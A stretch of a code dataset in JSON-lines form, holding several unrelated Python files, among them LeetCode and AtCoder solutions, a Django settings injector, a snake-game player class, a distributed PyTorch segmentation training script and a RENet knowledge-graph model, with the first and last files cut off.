Solution(object):\n def longestValidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n sol = [0 for _ in range(len(s))]\n res = 0\n for i in range(1, len(s)):\n if s[i] == \")\":\n if s[i - 1] == \"(\":\n sol[i] = 2 + (0 if i < 2 else sol[i - 2])\n else:\n #i-1 sol 存在\n if sol[i - 1] != 0:\n if i - 1 - sol[i - 1] >= 0 and s[i - 1 - sol[i - 1]] == \"(\":\n sol[i] = 2 + sol[i - 1] + (0 if i - sol[i - 1] - 2 < 0 else sol[i - 2 - sol[i - 1]])\n res = max(res, sol[i])\n return res \n\n\n\n","sub_path":"interview/others/hard/LC32. Longest Valid Parentheses.py","file_name":"LC32. Longest Valid Parentheses.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526772241","text":"class Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n nums.sort()\n \n global_sum, global_diff = 0, float('inf')\n for i in range(len(nums) - 2):\n left = i + 1\n right = len(nums) - 1\n local_target = target - nums[i]\n local_sum, local_diff = 0, float('inf')\n while left < right:\n cur_sum = nums[left] + nums[right]\n cur_diff = abs(cur_sum - local_target)\n if cur_diff < local_diff:\n local_sum = nums[left] + nums[right]\n local_diff = cur_diff\n if cur_sum > local_target:\n right -= 1\n else:\n left += 1\n if local_diff < global_diff:\n global_sum = nums[i] + local_sum\n global_diff = local_diff\n return global_sum\n\n","sub_path":"16_3Sum_Closest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"294788786","text":"from django.conf import settings\n\nfrom django_configuration_management.aws_utils import pull_aws_config_data\nfrom django_configuration_management.utils import (\n load_env,\n normalize_config_data,\n)\nfrom django_configuration_management.yml_utils import yml_to_dict\n\n\ndef get_config(environment: str, dotenv_required=True):\n try:\n load_env(environment)\n except AssertionError as error:\n if dotenv_required:\n raise error\n\n local_secrets, aws_secrets = yml_to_dict(environment)\n\n normalized_local_secrets = normalize_config_data(local_secrets)\n pulled_aws_secrets = pull_aws_config_data(aws_secrets)\n\n return {**normalized_local_secrets, **pulled_aws_secrets}\n\n\ndef inject_config(environment: str, settings_module: settings, dotenv_required=True):\n config = get_config(environment, dotenv_required)\n\n for key, value in config.items():\n setattr(settings_module, key, value)\n","sub_path":"django_configuration_management/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"34835671","text":"from logging import getLogger\n\nfrom .messaging import Messaging\nfrom .snake import Snake\n\nlogger = getLogger(__name__)\n\n\nclass Player:\n snake = None\n\n def __init__(self, player_id, name, ws):\n self.id = player_id\n self.name = name\n self.wss = []\n self.score = 0\n self.keymap = {\n Messaging.CMD_LEFT: Snake.LEFT,\n Messaging.CMD_UP: Snake.UP,\n Messaging.CMD_RIGHT: Snake.RIGHT,\n Messaging.CMD_DOWN: Snake.DOWN,\n }\n self.add_connection(ws)\n\n def __repr__(self):\n return '<%s [id=%s] [name=%s] [color=%s]>' % (self.__class__.__name__, str(self.id)[:8], self.name, self.color)\n\n def add_connection(self, ws):\n self.wss.append(ws)\n\n def shutdown(self):\n self.wss.clear()\n\n def is_connection_closed(self):\n return any(ws.closed or ws.close_code for ws in self.wss)\n\n def new_snake(self, game_settings, world, color):\n self.snake = Snake(game_settings, world, color)\n\n def keypress(self, code):\n if not self.alive:\n return\n\n direction = self.keymap.get(code)\n snake_direction = self.snake.direction\n\n if direction and snake_direction:\n # do not move in the opposite direction\n if snake_direction == self.snake.current_direction and not (\n direction.xdir == -snake_direction.xdir and\n direction.ydir == -snake_direction.ydir):\n self.snake.direction = direction\n logger.info('%r changed direction to %r', self, direction)\n\n @property\n def alive(self):\n if self.snake:\n return self.snake.alive\n else:\n return False\n\n @alive.setter\n def alive(self, value):\n self.snake.alive = value\n\n @property\n def color(self):\n if self.snake:\n return self.snake.color\n else:\n return None\n\n @property\n def direction(self):\n if self.snake:\n return self.snake.direction\n else:\n return None\n","sub_path":"snakepit/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219804821","text":"from datetime import datetime\nfrom itertools import chain\nimport os\nfrom pprint import pprint\nimport random\nfrom timeit import default_timer\nimport warnings\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nfrom sklearn.metrics import confusion_matrix\nfrom tensorboardX import SummaryWriter\nimport timeit\nimport torch\nimport torch.distributed as distr\nimport torch.multiprocessing as multiproc\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader, sampler\nfrom torch.utils.data.distributed import DistributedSampler\nimport torchvision.transforms as T\nfrom torchvision.utils import make_grid\nfrom tqdm import tqdm\n\nfrom datasets.voc_dual_task import VOCDualTask\nfrom models.losses.losses import MeanSquaredAngularLoss\nfrom models.deeplabv3plus_multitask import Deeplabv3plus_multitask\nimport transforms.transforms as myT\nfrom config.config import VOCConfig\nimport utils.utils as utils\n\n\ncfg = VOCConfig()\n\n# Fix all seeds for reproducibility\nseed = 777\nrandom.seed(seed)\nnp.random.seed(seed)\ntorch.manual_seed(seed)\n#torch.backends.cudnn.deterministic = True\n#torch.backends.cudnn.benchmark = False\n\n\n\ndef calc_iou(confusion_matrix):\n \"\"\"\n Calculates per-class IoUs from numpy confusion matrix.\n \"\"\"\n class_iou = [0] * len(confusion_matrix)\n\n for i in range(len(confusion_matrix)):\n\n intersection = confusion_matrix[i,i]\n union = np.sum(confusion_matrix[i,:]) + np.sum(confusion_matrix[:,i]) - intersection\n \n if union == 0:\n warnings.warn(\"IoU calculation: union is zero!\")\n class_iou[i] = 0\n else:\n class_iou[i] = intersection / union\n \n return class_iou\n\n\ndef calc_confusion_matrix(target, prediction, labels):\n \"\"\"\n Computes confusion matrix. NOTE: predictions need to be already argmaxed\n \"\"\"\n\n target = target.flatten()\n prediction = prediction.flatten()\n\n conf_matrix = confusion_matrix(target, prediction, labels=labels)\n \n return conf_matrix\n\n\ndef setup_dataloaders(rank):\n \"\"\"\n Initialise datasets, samplers and return dataloaders.\n \"\"\"\n\n # Dataset transforms\n transform = T.Compose([\n myT.Quantise(level_widths=cfg.LEVEL_WIDTHS),\n myT.Resize(cfg.DATA_RESCALE),\n myT.RandomResizedCrop(cfg.RESIZEDCROP_SCALE_RANGE, cfg.DATA_RESCALE),\n myT.RandomHorizontalFlip(),\n myT.ColourJitter(cfg.BRIGHTNESS, cfg.CONTRAST, cfg.SATURATION, cfg.HUE),\n myT.ToTensor()])\n\n # Datasets\n VOC_train = VOCDualTask(\n cfg.DSET_ROOT,\n image_set=\"train\",\n transform=transform)\n VOC_val = VOCDualTask(\n cfg.DSET_ROOT,\n image_set=\"val\",\n transform=transform)\n \n # Distributed samplers\n sampler_train = DistributedSampler(\n VOC_train,\n num_replicas=cfg.TRAIN_GPUS,\n rank=rank)\n sampler_val = DistributedSampler(\n VOC_val,\n num_replicas=cfg.TRAIN_GPUS,\n rank=rank)\n\n # Data loaders\n loader_train = DataLoader(\n VOC_train,\n batch_size=cfg.TRAIN_BATCH_SIZE,\n sampler=sampler_train,\n num_workers=cfg.DATALOADER_JOBS,\n pin_memory=True,\n drop_last=True)\n loader_val = DataLoader(\n VOC_val,\n batch_size=cfg.VAL_BATCH_SIZE,\n sampler=sampler_val,\n num_workers=cfg.DATALOADER_JOBS,\n pin_memory=True,\n drop_last=True)\n \n return loader_train, loader_val\n\n\ndef setup_model(rank):\n \"\"\"\n Initialise model and load pretrained backbone weights.\n \"\"\"\n backbone = \"xception\"\n \n # Initialise model\n model = Deeplabv3plus_multitask(\n seg_classes=cfg.N_CLASSES,\n dist_classes=cfg.N_ENERGY_LEVELS,\n third_branch=False,\n backbone=backbone)\n # Convert batchnorm to synchronised batchnorm\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n model.to(rank)\n if rank == 0:\n print(\n \"GPUs found:\", torch.cuda.device_count(),\n \"\\tGPUs used by all processes:\", cfg.TRAIN_GPUS)\n # Wrap in distributed dataparallel\n model = DistributedDataParallel(model, device_ids=[rank], output_device=rank, find_unused_parameters=True)\n \n # Load pretrained model weights only for backbone network, if backbone is xception\n if cfg.USE_PRETRAINED and backbone == \"xception\":\n current_dict = model.state_dict()\n pretrained_dict = torch.load(os.path.join(\n cfg.PRETRAINED_PATH,\n \"mod_al_xception_imagenet.pth\"))\n # Keys of pretrained model need to be modified so they match keys\n # of backbone in new model\n pretrained_dict = {\n \"module.backbone.\" + k: v for k, v in pretrained_dict.items()\n }\n\n current_dict.update(pretrained_dict)\n model.load_state_dict(current_dict)\n\n if rank == 0:\n print(\"Loaded pretrained backbone.\")\n \n if rank == 0:\n # Print number of model parameters\n n_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"Number of learnable parameters:\", n_params)\n \n return model\n\n\ndef log_all_confusion_mat(\n logger,\n train_seg,\n train_dist,\n val_seg,\n val_dist,\n epoch,\n isnormalised):\n \"\"\"\n Logs confusion matrices for segmentation and distance transform, and for \n training and validation data (4 matrices in total).\n Args:\n - logger: tensorboard logger.\n - train_seg\n - train_dist\n - val_seg\n - val_dist\n - epoch: current training epoch.\n - isnormalised (bool): whether the matrices are normalised or not.\n \"\"\"\n\n postfix = \"\"\n fmt = \"0.0f\"\n if isnormalised:\n postfix = \"_n\"\n fmt = \"0.3f\"\n\n utils.log_confusion_mat(\n logger,\n train_seg,\n (16,10),\n \"train_confusion_seg\" + postfix,\n fmt,\n epoch,\n list(cfg.CLASSES.values()),\n list(cfg.CLASSES.values()))\n utils.log_confusion_mat(\n logger,\n train_dist,\n (9,7),\n \"train_confusion_dist\" + postfix,\n fmt,\n epoch,\n \"auto\",\n \"auto\")\n utils.log_confusion_mat(\n logger,\n val_seg,\n (16,10),\n \"val_confusion_seg\" + postfix,\n fmt,\n epoch,\n list(cfg.CLASSES.values()),\n list(cfg.CLASSES.values()))\n utils.log_confusion_mat(\n logger,\n val_dist,\n (9,7),\n \"val_confusion_dist\" + postfix,\n fmt,\n epoch,\n \"auto\",\n \"auto\")\n\n\ndef train(rank, world_size):\n \"\"\"\n Training function. Multiple processes will be spawned with this function.\n\n Args:\n - rank (int): index of current process.\n - world_size (int): total number of processes.\n \"\"\"\n\n # Set address and port of master process\n # (it's required, even though I'm training on only one machine)\n os.environ[\"MASTER_ADDR\"] = \"localhost\"\n os.environ[\"MASTER_PORT\"] = \"12355\"\n\n # Initialize process group\n distr.init_process_group(\"gloo\", rank=rank, world_size=world_size)\n\n # Specify GPU to send this process to\n torch.cuda.set_device(rank)\n\n # Dataloaders\n loader_train, loader_val = setup_dataloaders(rank)\n\n # Initialise tensorboardX logger only in process 0\n if cfg.LOG and rank == 0:\n now = datetime.now()\n tbX_logger = SummaryWriter(\n os.path.join(cfg.LOG_PATH, now.strftime(\"%Y%m%d-%H%M\")))\n\n # Model setup\n model = setup_model(rank)\n\n # Set losses for semantic, distance and gradient direction\n seg_criterion = nn.CrossEntropyLoss(ignore_index=255)\n\n total_px = cfg.DATA_RESCALE ** 2\n weights = torch.tensor([\n total_px / 2789,\n total_px / 6636,\n total_px / 10678,\n total_px / 26170,\n total_px / 27594,\n total_px / 33966,\n total_px / 33467,\n total_px / 40680,\n total_px / 39469,\n total_px / 40696\n ]).to(rank)\n dist_criterion = nn.CrossEntropyLoss(weight=weights)\n\n #grad_criterion = MeanSquaredAngularLoss()\n\n\n # Optimiser setup\n optimiser = optim.SGD(\n params = model.parameters(),\n lr = cfg.TRAIN_LR,\n momentum=cfg.TRAIN_MOMENTUM)\n\n # Initialise iteration index\n i = 0\n max_i = cfg.TRAIN_EPOCHS * len(loader_train)\n\n # Train loop\n for epoch in range(cfg.TRAIN_EPOCHS):\n \n # These values only need to be logged in process 0\n if rank == 0:\n train_loss = 0.\n train_seg_loss = 0.\n train_dist_loss = 0.\n #train_grad_loss = 0.\n\n if cfg.LOG:\n # Initialise confusion matrices\n train_seg_confusion = np.zeros(\n (cfg.N_CLASSES, cfg.N_CLASSES),\n dtype=\"float\")\n train_dist_confusion = np.zeros(\n (cfg.N_ENERGY_LEVELS, cfg.N_ENERGY_LEVELS),\n dtype=\"float\")\n val_seg_confusion = np.zeros(\n (cfg.N_CLASSES, cfg.N_CLASSES),\n dtype=\"float\")\n val_dist_confusion = np.zeros(\n (cfg.N_ENERGY_LEVELS, cfg.N_ENERGY_LEVELS),\n dtype=\"float\")\n \n # Initialise tqdm only on process 0\n if rank == 0:\n loader_train = tqdm(loader_train, ascii=True, desc=\"Train\")\n\n model.train()\n\n for train_batch_i, train_batch in enumerate(loader_train):\n\n train_inputs = train_batch[\"image\"].to(rank)\n\n # Categorical labels need to be converted from float 0-1 to integers\n train_seg = train_batch[\"seg\"].mul(255).round().long().squeeze(1).to(rank)\n train_dist = train_batch[\"dist\"].mul(255).round().long().squeeze(1).to(rank)\n\n # gradient direction is not categorical, so no conversion\n #train_grad = train_batch[\"grad\"].to(rank)\n\n if cfg.ADJUST_LR:\n lr = utils.adjust_lr(\n optimiser,\n i,\n max_i,\n cfg.TRAIN_LR,\n cfg.TRAIN_POWER)\n else:\n lr = cfg.TRAIN_LR\n\n optimiser.zero_grad()\n\n train_predicted_seg, train_predicted_dist = model(train_inputs)\n\n # Calculate losses\n seg_loss = seg_criterion(train_predicted_seg, train_seg)\n dist_loss = dist_criterion(train_predicted_dist, train_dist)\n #grad_loss = grad_criterion(train_predicted_grad, train_grad)\n loss = seg_loss + dist_loss # + grad_loss\n loss.backward()\n optimiser.step()\n\n i += 1\n\n # Update losses to display\n if rank == 0:\n train_loss += loss.item()\n train_seg_loss += seg_loss.item()\n train_dist_loss += dist_loss.item()\n #train_grad_loss += grad_loss.item()\n\n batch_pixels = cfg.DATA_RESCALE ** 2 * cfg.TRAIN_BATCH_SIZE\n seg_argmax = torch.argmax(train_predicted_seg, dim=1)\n dist_argmax = torch.argmax(train_predicted_dist, dim=1)\n\n if cfg.LOG and epoch % 20 == 0 or epoch == cfg.TRAIN_EPOCHS - 1:\n # Accumulate confusion matrices\n train_seg_confusion += calc_confusion_matrix(\n train_seg.cpu(),\n seg_argmax.cpu(),\n labels=list(cfg.CLASSES.keys())\n ) / cfg.TRAIN_BATCH_SIZE\n train_dist_confusion += calc_confusion_matrix(\n train_dist.cpu(),\n dist_argmax.cpu(),\n labels=list(range(cfg.N_ENERGY_LEVELS))\n ) / cfg.TRAIN_BATCH_SIZE\n\n # Again, only log on process 0\n if rank == 0:\n val_loss = 0.\n val_seg_loss = 0.\n val_dist_loss = 0.\n #val_grad_loss = 0.\n\n # Initialise tqdm\n if rank == 0:\n loader_val = tqdm(loader_val, ascii=True, desc=\"Valid\")\n\n model.eval()\n\n with torch.no_grad():\n for val_batch_i, val_batch in enumerate(loader_val):\n\n val_inputs = val_batch[\"image\"].to(rank)\n val_seg = val_batch[\"seg\"].mul(255).round().long().squeeze(1).to(rank)\n val_dist = val_batch[\"dist\"].mul(255).round().long().squeeze(1).to(rank)\n #val_grad = val_batch[\"grad\"].to(rank)\n\n val_predicted_seg, val_predicted_dist = model(val_inputs)\n\n # Calculate losses\n if rank == 0:\n seg_loss = seg_criterion(val_predicted_seg, val_seg)\n dist_loss = dist_criterion(val_predicted_dist, val_dist)\n #grad_loss = grad_criterion(val_predicted_grad, val_grad)\n loss = seg_loss + dist_loss # + grad_loss\n val_loss += loss.item()\n val_seg_loss += seg_loss.item()\n val_dist_loss += dist_loss.item()\n #val_grad_loss += grad_loss.item()\n\n batch_pixels = cfg.DATA_RESCALE ** 2 * cfg.VAL_BATCH_SIZE\n seg_argmax = torch.argmax(val_predicted_seg, dim=1)\n dist_argmax = torch.argmax(val_predicted_dist, dim=1)\n\n if cfg.LOG and epoch % 20 == 0 or epoch == cfg.TRAIN_EPOCHS - 1:\n # Accumulate confusion matrices\n val_seg_confusion += calc_confusion_matrix(\n val_seg.cpu(),\n seg_argmax.cpu(),\n labels=list(cfg.CLASSES.keys())\n ) / cfg.TRAIN_BATCH_SIZE\n val_dist_confusion += calc_confusion_matrix(\n val_dist.cpu(),\n dist_argmax.cpu(),\n labels=list(range(cfg.N_ENERGY_LEVELS))\n ) / cfg.TRAIN_BATCH_SIZE\n\n # Only print info and log to tensorboard in process 0\n if rank == 0:\n # Average training losses on all batches\n train_loss /= len(loader_train)\n train_seg_loss /= len(loader_train)\n train_dist_loss /= len(loader_train)\n #train_grad_loss /= len(loader_train)\n\n # Average validation losses on batches\n val_loss /= len(loader_val)\n val_seg_loss /= len(loader_val)\n val_dist_loss /= len(loader_val)\n #val_grad_loss /= len(loader_val)\n\n print(\"Epoch: %d/%d\\ti: %d\\tlr: %g\\ttrain_loss: %g\\tval_loss: %g\\n\"\n % (epoch+1, cfg.TRAIN_EPOCHS, i, lr, train_loss, val_loss))\n\n if cfg.LOG:\n # Log scalars to tensorboardX\n tbX_logger.add_scalars(\n \"total_losses\", {\n \"train_loss\": train_loss,\n \"val_loss\": val_loss\n },\n epoch)\n tbX_logger.add_scalars(\n \"seg_loss\", { \n \"train_seg_loss\": train_seg_loss,\n \"val_seg_loss\": val_seg_loss\n },\n epoch)\n tbX_logger.add_scalars(\n \"dist_loss\", {\n \"train_dist_loss\": train_dist_loss,\n \"val_dist_loss\": val_dist_loss\n },\n epoch) \n tbX_logger.add_scalar(\"lr\", lr, epoch)\n\n # it seems like tensorboard doesn't like saving a lot of images,\n # so log images only every few epochs\n if epoch % 20 == 0 or epoch == cfg.TRAIN_EPOCHS - 1:\n\n\n # Calculate IoUs from confusion matrices\n train_seg_iou = calc_iou(train_seg_confusion)\n train_dist_iou = calc_iou(train_dist_confusion)\n val_seg_iou = calc_iou(val_seg_confusion)\n val_dist_iou = calc_iou(val_dist_confusion)\n \n tbX_logger.add_scalars(\n \"seg_iou\", {\n \"train_seg_iou\": np.mean(train_seg_iou),\n \"val_seg_iou\": np.mean(val_seg_iou)\n },\n epoch)\n tbX_logger.add_scalars(\n \"dist_iou\", {\n \"train_dist_iou\": np.mean(train_dist_iou),\n \"val_dist_iou\": np.mean(val_dist_iou)\n },\n epoch)\n\n # Convert training images for plotting\n train_input_tb = make_grid(train_inputs).cpu().numpy()\n train_seg_tb = make_grid(utils.colormap(\n train_seg.float().div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n train_seg_prediction_tb = make_grid(utils.colormap(\n torch.argmax(train_predicted_seg, dim=1).float() \\\n .div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n train_dist_tb = make_grid(utils.colormap(\n train_dist.float().div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy()\n train_dist_prediction_tb = make_grid(utils.colormap(\n torch.argmax(train_predicted_dist, dim=1).float() \\\n .div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy()\n\n blue_channel = torch.zeros(\n cfg.TRAIN_BATCH_SIZE,\n 1,\n cfg.DATA_RESCALE,\n cfg.DATA_RESCALE).to(rank)\n\n # Convert val images for plotting\n val_input_tb = make_grid(val_inputs).cpu().numpy()\n val_seg_tb = make_grid(utils.colormap(\n val_seg.float().div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n val_seg_prediction_tb = make_grid(utils.colormap(\n torch.argmax(val_predicted_seg, dim=1).float() \\\n .div(cfg.N_CLASSES).unsqueeze(1).cpu())).numpy()\n val_dist_tb = make_grid(utils.colormap(\n val_dist.float().div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy()\n val_dist_prediction_tb = make_grid(utils.colormap(\n torch.argmax(val_predicted_dist, dim=1).float() \\\n .div(cfg.N_ENERGY_LEVELS).unsqueeze(1).cpu())).numpy() \n\n # Training images\n tbX_logger.add_image(\"train_input\", train_input_tb, epoch)\n tbX_logger.add_image(\"train_seg\", train_seg_tb, epoch)\n tbX_logger.add_image(\n \"train_seg_prediction\",\n train_seg_prediction_tb,\n epoch)\n tbX_logger.add_image(\"train_dist\", train_dist_tb, epoch) \n tbX_logger.add_image(\n \"train_dist_prediction\",\n train_dist_prediction_tb,\n epoch)\n\n # Validation images\n tbX_logger.add_image(\"val_input\", val_input_tb, epoch)\n tbX_logger.add_image(\"val_seg\", val_seg_tb, epoch)\n tbX_logger.add_image(\n \"val_seg_prediction\",\n val_seg_prediction_tb,\n epoch)\n tbX_logger.add_image(\"val_dist\", val_dist_tb, epoch) \n tbX_logger.add_image(\n \"val_dist_prediction\",\n val_dist_prediction_tb,\n epoch)\n\n # Divide unnormalised matrices\n train_seg_confusion /= len(loader_train)\n train_dist_confusion /= len(loader_train)\n val_seg_confusion /= len(loader_val)\n val_dist_confusion /= len(loader_val)\n\n # Normalise confusion matrices\n train_seg_confusion_n = utils.normalise_confusion_mat(\n train_seg_confusion)\n train_dist_confusion_n = utils.normalise_confusion_mat(\n train_dist_confusion)\n val_seg_confusion_n = utils.normalise_confusion_mat(\n val_seg_confusion)\n val_dist_confusion_n = utils.normalise_confusion_mat(\n val_dist_confusion)\n\n # Log confusion matrices to tensorboard\n log_all_confusion_mat(\n tbX_logger,\n train_seg_confusion,\n train_dist_confusion,\n val_seg_confusion,\n val_dist_confusion,\n epoch,\n isnormalised=False)\n\n # Log normalised confusion matrices to tensorboard\n log_all_confusion_mat(\n tbX_logger,\n train_seg_confusion_n,\n train_dist_confusion_n,\n val_seg_confusion_n,\n val_dist_confusion_n,\n epoch,\n isnormalised=True)\n\n # Save checkpoint\n if epoch % 20 == 0 and epoch != 0 and rank == 0:\n save_path = os.path.join(\n cfg.PRETRAINED_PATH,\n \"%s_%s_%s_epoch%d.pth\"\n %(cfg.MODEL_NAME, cfg.MODEL_BACKBONE, cfg.DATA_NAME, epoch))\n torch.save(model.state_dict(), save_path)\n print(\"%s has been saved.\" %save_path)\n\n if cfg.LOG and rank == 0:\n tbX_logger.close()\n\n # Save final trained model\n if rank == 0:\n save_path = os.path.join(\n cfg.PRETRAINED_PATH,\n \"%s_%s_%s_epoch%d_final_noskip_noaspp.pth\"\n %(cfg.MODEL_NAME, cfg.MODEL_BACKBONE, cfg.DATA_NAME, cfg.TRAIN_EPOCHS))\n torch.save(model.state_dict(), save_path)\n print(\"FINISHED: %s has been saved.\" %save_path)\n\n distr.destroy_process_group()\n\n\nif __name__ == \"__main__\":\n\n world_size = cfg.TRAIN_GPUS\n # Spawn training processes\n multiproc.spawn(train, args=(world_size,), nprocs=world_size, join=True)","sub_path":"voc_distributed_train.py","file_name":"voc_distributed_train.py","file_ext":"py","file_size_in_byte":22643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"331341015","text":"\n\n#calss header\nclass _SCORPION():\n\tdef __init__(self,): \n\t\tself.name = \"SCORPION\"\n\t\tself.definitions = [u'a small creature similar to an insect that lives in hot, dry areas of the world and has a long body and a curved tail with a poisonous sting (= pointed part that can go through skin)']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_scorpion.py","file_name":"_scorpion.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628823667","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\n\ndef load_train_data():\n\tdf = pd.read_csv('train.csv')\n\tX = df.values.copy()\n\tnp.random.shuffle(X)\n\tX, labels = X[:, 1:-1].astype(np.float32), X[:, -1]\n\tencoder = LabelEncoder()\n\ty = encoder.fit_transform(labels).astype(np.int32)\n\tscaler = StandardScaler()\n\tX = scaler.fit_transform(X)\n\treturn X, y, encoder, scaler\n\ndef load_test_data(scaler):\n\tdf = pd.read_csv('test.csv')\n\tX = df.values.copy()\n\tX, ids = X[:, 1:].astype(np.float32), X[:, 0].astype(str)\n\tX = scaler.transform(X)\n\treturn X, ids\n\ndef make_submission(clf, X_test, ids, encoder, name='submission.csv'):\n\ty_prob = clf.predict_proba(X_test)\n\twith open(name, 'w') as f:\n\t\tf.write('id,')\n\t\tf.write(','.join(encoder.classes_))\n\t\tf.write('\\n')\n\t\tfor id, probs in zip(ids, y_prob):\n\t\t\tprobas = ','.join([id] + map(str, probs.tolist()))\n\t\t\tf.write(probas)\n\t\t\tf.write('\\n')\n\tprint(\"Wrote submission to file {}.\".format(name))","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"126244881","text":"import sys\nsys.setrecursionlimit(1 << 20)\nINF = float('inf')\n\n\ndef read_int_list():\n return list(map(int, input().split()))\n\n\ndef read_ints():\n return map(int, input().split())\n\n\ndef main():\n A, B, K, L = read_ints()\n BL = B / L\n if A <= BL:\n print(K * A)\n else:\n if K % L == 0:\n print(B * (K // L))\n else:\n cand1 = B * (K // L + 1)\n cand2 = B * (K // L) + A * (K - L * (K // L))\n print(min(cand1, cand2))\n\n\nmain()\n","sub_path":"arc/arc56a.py","file_name":"arc56a.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"144632126","text":"import torch.nn as nn\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom Aggregator import MeanAggregator, AttnAggregator\n\n\nclass RENet(nn.Module):\n def __init__(self, in_dim, h_dim, num_rels, dropout=0, model=0, seq_len=10):\n super(RENet, self).__init__()\n self.in_dim = in_dim\n self.h_dim = h_dim\n self.num_rels = num_rels\n self.model = model\n self.seq_len = seq_len\n self.rel_embeds = nn.Parameter(torch.Tensor(num_rels, h_dim))\n nn.init.xavier_uniform_(self.rel_embeds,\n gain=nn.init.calculate_gain('relu'))\n\n self.ent_embeds = nn.Parameter(torch.Tensor(in_dim, h_dim))\n nn.init.xavier_uniform_(self.ent_embeds,\n gain=nn.init.calculate_gain('relu'))\n\n self.dropout = nn.Dropout(dropout)\n self.sub_encoder = nn.GRU(3 * h_dim, h_dim, batch_first=True)\n self.ob_encoder = nn.GRU(3 * h_dim, h_dim, batch_first=True)\n\n if model == 0: # Attentive Aggregator\n self.aggregator_s = AttnAggregator(h_dim, dropout, seq_len)\n self.aggregator_o = AttnAggregator(h_dim, dropout, seq_len)\n elif model == 1: # Mean Aggregator\n self.aggregator_s = MeanAggregator(h_dim, dropout, seq_len, gcn=False)\n self.aggregator_o = MeanAggregator(h_dim, dropout, seq_len, gcn=False)\n elif model == 2: # GCN Aggregator\n self.aggregator_s = MeanAggregator(h_dim, dropout, seq_len, gcn=True)\n self.aggregator_o = MeanAggregator(h_dim, dropout, seq_len, gcn=True)\n\n\n self.linear_sub = nn.Linear(3 * h_dim, in_dim)\n self.linear_ob = nn.Linear(3 * h_dim, in_dim)\n\n # For recording history in inference\n self.s_hist_test = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n self.o_hist_test = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n self.s_his_cache = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n self.o_his_cache = [[[] for _ in range(num_rels)] for _ in range(in_dim)]\n self.latest_time = 0\n\n self.criterion = nn.CrossEntropyLoss()\n\n\n \"\"\"\n Prediction function in training. \n This should be different from testing because in testing we don't use ground-truth history.\n \"\"\"\n def forward(self, triplets, s_hist, o_hist):\n s = triplets[:, 0]\n r = triplets[:, 1]\n o = triplets[:, 2]\n\n s_hist_len = torch.LongTensor(list(map(len, s_hist))).cuda()\n s_len, s_idx = s_hist_len.sort(0, descending=True)\n\n o_hist_len = torch.LongTensor(list(map(len, o_hist))).cuda()\n o_len, o_idx = o_hist_len.sort(0, descending=True)\n\n s_packed_input = self.aggregator_s(s_hist, s, r, self.ent_embeds, self.rel_embeds)\n o_packed_input = self.aggregator_o(o_hist, o, r, self.ent_embeds, self.rel_embeds)\n\n tt, s_h = self.sub_encoder(s_packed_input)\n tt, o_h = self.ob_encoder(o_packed_input)\n\n s_h = s_h.squeeze()\n o_h = o_h.squeeze()\n\n # print(s_h.shape)\n s_h = torch.cat((s_h, torch.zeros(len(s) - len(s_h), self.h_dim).cuda()), dim=0)\n o_h = torch.cat((o_h, torch.zeros(len(o) - len(o_h), self.h_dim).cuda()), dim=0)\n\n ob_pred = self.linear_sub(\n self.dropout(torch.cat((self.ent_embeds[s[s_idx]], s_h, self.rel_embeds[r[s_idx]]), dim=1)))\n sub_pred = self.linear_ob(\n self.dropout(torch.cat((self.ent_embeds[o[o_idx]], o_h, self.rel_embeds[r[o_idx]]), dim=1)))\n\n loss_sub = self.criterion(ob_pred, o[s_idx])\n loss_ob = self.criterion(sub_pred, s[o_idx])\n\n loss = loss_sub + loss_ob\n\n return loss, sub_pred, ob_pred, o_idx, s_idx\n\n\n def init_history(self):\n self.s_hist_test = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n self.o_hist_test = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n self.s_his_cache = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n self.o_his_cache = [[[] for _ in range(self.num_rels)] for _ in range(self.in_dim)]\n\n\n def get_loss(self, triplets, s_hist, o_hist):\n loss, _, _, _, _ = self.forward(triplets, s_hist, o_hist)\n return 